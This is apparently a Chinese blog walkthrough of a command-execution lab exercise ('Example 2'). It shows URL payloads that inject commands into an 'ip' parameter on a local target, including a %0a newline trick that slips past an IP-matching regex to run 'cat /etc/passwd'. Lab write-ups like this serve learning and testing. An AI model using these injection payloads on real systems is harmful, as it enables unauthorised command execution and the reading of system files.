我们打开靶机
选择“Example 2”
观察页面
我们尝试
http://192.168.29.148/commandexec/example2.php?ip=127.0.0.1;ifconfig
结果
我们尝试%0a
于是payload为
http://192.168.29.148/commandexec/example2.php?ip=127.0.0.1%0acat%20/etc/passwd
结果
我们观察靶机源码
使用了正则来匹配IP地址
可以使用%0a进行截断
标签:web,127.0,http,ip,29.148,192.168,example2,EXP2,PentestLab From: https://blog.51cto.com/apple0/6171202